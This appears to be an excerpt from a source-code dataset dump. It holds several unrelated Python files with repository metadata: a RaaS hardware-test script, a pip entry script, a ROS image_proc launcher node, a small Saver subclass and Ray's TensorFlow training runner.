    client = raas_client.RaasClient(host="193.208.80.31", port=8000)
    try:
        k64f = client.allocate({"platform_name": [platform_name]})
        print "allocated", k64f.info()
        print "flashing...",
        k64f.flash(binary)
        print "flashed"
        serial_params = raas_client.SerialParameters(lineMode=True, baudrate=9600, bufferSize=256)
        print "opening connection to k64f"
        k64f.openConnection(parameters=serial_params)
        print "resetting...",
        k64f.reset()
        print "reset"
        data = "start"
        print "starting serial capture"
        serial_out = ""
        # an empty read (timeout expired) ends the capture loop
        while(data != ""):
            data = k64f.readline(timeout=15)
            serial_out += data
            print "[DATA]", data.strip()
        k64f.closeConnection()
        k64f.release()
    finally:
        # always free the server-side session
        client.disconnect()
    return serial_out
if __name__ == '__main__':
    # CLI wrapper: flash the given binary and dump the captured serial log.
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("binary", help="Path to binary")
    args = parser.parse_args()
    print run_test_raas(args.binary)
| [
"[email protected]"
] | |
24007ef5ef566f228a7667133ecccce9e2ca71b6 | 9be143a314f58bad3ca607e8c322415e6d05a30f | /venv/Scripts/pip3-script.py | 5c0139f6223e17f6c9f55c676299039aed715457 | [] | no_license | zibb03/Face-Emotion-Recognition | baec3b7d57636642641e52afd73f1ef5436a51d6 | fd5b04fc34fc8cfa9415ae7ab5fa85316c3be6d4 | refs/heads/main | 2023-06-18T15:49:40.905788 | 2021-07-19T15:05:00 | 2021-07-19T15:05:00 | 355,542,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | #!C:\Users\user\PycharmProjects\OpenCV\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| [
"[email protected]"
] | |
2949ad30d2c1f779dd0f7906f17943d31c121fb1 | eac22714038e840028cc5abb72bc750004626ebb | /mct_camera_tools/nodes/image_proc_master.py | 3316d09e4957ac3d0f6500030feeee1cccdedf4f | [
"Apache-2.0"
] | permissive | iorodeo/mct | 79b19f6dab9f6567452df7274d67245bf64b1801 | fa8b85f36533c9b1486ca4f6b0c40c3daa6f4e11 | refs/heads/master | 2022-11-11T18:03:18.178182 | 2014-08-20T19:21:27 | 2014-08-20T19:21:27 | 273,790,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,780 | py | #!/usr/bin/env python
from __future__ import print_function
import roslib
roslib.load_manifest('mct_camera_tools')
import rospy
import os
import os.path
import tempfile
import subprocess
from mct_xml_tools import launch
# Services
from mct_msg_and_srv.srv import CommandString
from mct_msg_and_srv.srv import CommandStringResponse
class Image_Proc_Master(object):
    """
    Image proc master ROS node.

    Provides the 'image_proc_master' service which launches/kills image_proc
    nodes for every camera with a calibration.
    """

    def __init__(self):
        # Launch file is generated on demand in the system temp directory.
        self.tmp_dir = tempfile.gettempdir()
        self.launch_file = os.path.join(self.tmp_dir, 'image_proc.launch')
        self.image_proc_popen = None  # Popen handle while nodes are running

        rospy.on_shutdown(self.clean_up)
        rospy.init_node('image_proc_master')

        self.camera_srv = rospy.Service(
                'image_proc_master',
                CommandString,
                self.handle_image_proc_srv,
                )

    def handle_image_proc_srv(self, req):
        """
        Handles requests to launch/kill the image proc nodes.
        """
        command = req.command.lower()
        response = True
        message = ''
        if command == 'start':
            if self.image_proc_popen is None:
                self.launch_image_proc_nodes()
            else:
                response = False
                message = 'image proc nodes already running'
        elif command == 'stop':
            if self.image_proc_popen is not None:
                self.kill_image_proc_nodes()
            else:
                response = False
                message = 'image proc nodes not running'
        else:
            response = False
            # Fixed typo in the user-facing error message ('uknown' -> 'unknown').
            message = 'unknown command: {0}'.format(command)
        return CommandStringResponse(response, message)

    def launch_image_proc_nodes(self):
        """
        Launches the image_proc nodes via a generated roslaunch file.
        """
        if self.image_proc_popen is None:
            launch.create_image_proc_launch(self.launch_file)
            self.image_proc_popen = subprocess.Popen(['roslaunch', self.launch_file])

    def kill_image_proc_nodes(self):
        """
        Kills the image_proc nodes and removes the generated launch file.
        """
        if self.image_proc_popen is not None:
            # SIGINT lets roslaunch shut its child nodes down cleanly.
            self.image_proc_popen.send_signal(subprocess.signal.SIGINT)
            self.image_proc_popen = None
            try:
                os.remove(self.launch_file)
            # 'except X as e' works on Python 2.6+ and Python 3,
            # unlike the old 'except X, e' form.
            except OSError as e:
                rospy.logwarn('Error removing image_proc launch file: {0}'.format(str(e)))

    def clean_up(self):
        # Called on rospy shutdown; make sure child processes are stopped.
        self.kill_image_proc_nodes()

    def run(self):
        # Block until the node is shut down.
        rospy.spin()
# -----------------------------------------------------------------------------
if __name__ == '__main__':
    # Instantiate the node and spin until ROS shutdown.
    node = Image_Proc_Master()
    node.run()
| [
"[email protected]"
] | |
f9023322bed3e99f7881e8b99b2959222c568474 | a22bdba754308dc8d64e6260957bbb028f75abe6 | /Utilities/saver/attoclass.py | 3246a476fdd3190d1c738d96bea8e2376eac686b | [] | no_license | HowDoIUseThis/Nowack_Lab | f592dc3b59bbbe36ae9253dc95a04cf6d8a0f0de | a943896b3cb8b3a326e1a2ef698b11a01884205a | refs/heads/master | 2021-01-12T22:07:13.105549 | 2016-08-02T21:59:19 | 2016-08-02T21:59:19 | 64,960,471 | 0 | 1 | null | 2016-08-04T19:09:10 | 2016-08-04T19:09:10 | null | UTF-8 | Python | false | false | 149 | py | from saver import Saver
class Atto(Saver):
    """Saver subclass representing a single attocube positioner axis."""

    def __init__(self, direction='x'):
        """Store the axis direction ('x' by default) as attribute ``c``."""
        super(Atto, self).__init__()
        self.c = direction
"[email protected]"
] | |
b9c56ac1d31b2218826dbd63b673f4c3cff2e16a | a2f78983557c1ead7b2a7c3e720d4719099878b9 | /python/ray/experimental/sgd/tf/tf_runner.py | 384136ba79630ef2660e8ee46da3cf60f3455ccf | [
"Apache-2.0",
"MIT"
] | permissive | Senmumu/ray | 3fc914a0a5d9da8fcaa3411bc04be7fba3ce6bbd | 130b8f21da4fb5383b079493faaea5d81065b772 | refs/heads/master | 2020-07-18T12:08:51.862689 | 2019-09-03T22:36:25 | 2019-09-03T22:36:25 | 206,242,928 | 1 | 0 | Apache-2.0 | 2019-09-04T05:59:44 | 2019-09-04T05:59:44 | null | UTF-8 | Python | false | false | 5,250 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import json
import os
import numpy as np
import ray
import ray.services
from ray.experimental.sgd import utils
logger = logging.getLogger(__name__)
def _try_import_strategy():
    """Late import for TensorFlow.

    Deferred so that merely importing this module does not require
    TensorFlow to be installed.
    """
    from tensorflow.distribute.experimental import MultiWorkerMirroredStrategy
    return MultiWorkerMirroredStrategy
class TFRunner(object):
    """Manages a TensorFlow model for training.

    One runner owns its own datasets and Keras model; in distributed mode
    the model is built under a MultiWorkerMirroredStrategy scope.
    """

    def __init__(self, model_creator, data_creator, config=None,
                 verbose=False):
        """Initializes the runner.

        Args:
            model_creator (dict -> Model): see tf_trainer.py.
            data_creator (dict -> tf.Dataset, tf.Dataset): see tf_trainer.py.
            config (dict): see tf_trainer.py.
            verbose (bool): Outputs training data if true.
        """
        self.model_creator = model_creator
        self.data_creator = data_creator
        self.config = {} if config is None else config
        self.epoch = 0
        self.verbose = verbose

    def setup(self):
        """Initializes the model (non-distributed, single-process case)."""
        logger.debug("Creating dataset")
        self.train_dataset, self.test_dataset = self.data_creator(self.config)

        logger.debug("Creating model")
        self.model = self.model_creator(self.config)

    def setup_distributed(self, urls, world_rank, world_size):
        """Sets up TensorFlow distributed environment and initializes the model.

        Args:
            urls (list[str]): the URLs that each node uses to connect.
            world_rank (int): the index of the runner.
            world_size (int): the total number of runners.
        """
        assert len(urls) == world_size
        tf_config = {
            "cluster": {
                "worker": urls
            },
            "task": {
                "index": world_rank,
                "type": "worker"
            }
        }
        # TF_CONFIG is written before the strategy is constructed; the
        # strategy reads the cluster spec from this env var.
        os.environ["TF_CONFIG"] = json.dumps(tf_config)

        MultiWorkerMirroredStrategy = _try_import_strategy()
        self.strategy = MultiWorkerMirroredStrategy()

        self.train_dataset, self.test_dataset = self.data_creator(self.config)

        logger.debug("Creating model with MultiWorkerMirroredStrategy")
        with self.strategy.scope():
            self.model = self.model_creator(self.config)

        # For use in model.evaluate()
        self.local_model = None

    def step(self):
        """Runs a training epoch and updates the model parameters.

        Returns a dict of 'train_'-prefixed metrics from the last epoch of
        model.fit(); empty when fit() returned no history object.
        """
        fit_default_config = {"verbose": self.verbose}
        fit_default_config.update(self.config.get("fit_config", {}))

        history = self.model.fit(self.train_dataset, **fit_default_config)
        if history is None:
            stats = {}
        else:
            stats = {"train_" + k: v[-1] for k, v in history.history.items()}

        self.epoch += 1
        return stats

    def validate(self):
        """Evaluates the model on the validation data set."""
        stats = {}
        evaluate_config = {"verbose": self.verbose}
        evaluate_config.update(self.config.get("evaluate_config", {}))

        results = self.model.evaluate(self.test_dataset, **evaluate_config)
        if results is None:
            # Using local Model since model.evaluate() returns None
            # for MultiWorkerMirroredStrategy
            logger.warning("Running a local model to get validation score.")
            self.local_model = self.model_creator(self.config)
            self.local_model.set_weights(self.model.get_weights())
            results = self.local_model.evaluate(self.test_dataset,
                                                **evaluate_config)

        if isinstance(results, list):
            # Pair each metric value with its name from the model.
            stats = {
                "validation_" + k: v
                for k, v in zip(self.model.metrics_names, results)
            }
        else:
            stats = {"loss": results}

        return stats

    def get_state(self):
        """Returns the state of the runner (epoch, model and optimizer weights)."""
        return {
            "epoch": self.epoch,
            "weights": self.model.get_weights(),
            "optimizer_weights": self.model.optimizer.get_weights()
        }

    def set_state(self, state):
        """Sets the state of the model from a dict produced by get_state()."""
        self.model = self.model_creator(self.config)
        self.epoch = state["epoch"]
        self.model.set_weights(state["weights"])
        # This part is due to ray.get() changing scalar np.int64 object to int
        state["optimizer_weights"][0] = np.array(
            state["optimizer_weights"][0], dtype=np.int64)

        # NOTE(review): _make_train_function() is private Keras API, needed
        # here to materialize optimizer weights before restoring them -
        # may break on newer TF versions.
        if self.model.optimizer.weights == []:
            self.model._make_train_function()
        self.model.optimizer.set_weights(state["optimizer_weights"])

    def shutdown(self):
        """Attempts to shut down the worker by dropping model/dataset references."""
        del self.model
        del self.train_dataset
        del self.test_dataset

    def get_node_ip(self):
        """Returns the IP address of the current node."""
        return ray.services.get_node_ip_address()

    def find_free_port(self):
        """Finds a free port on the current node."""
        return utils.find_free_port()
| [
"[email protected]"
] |
Subsets and Splits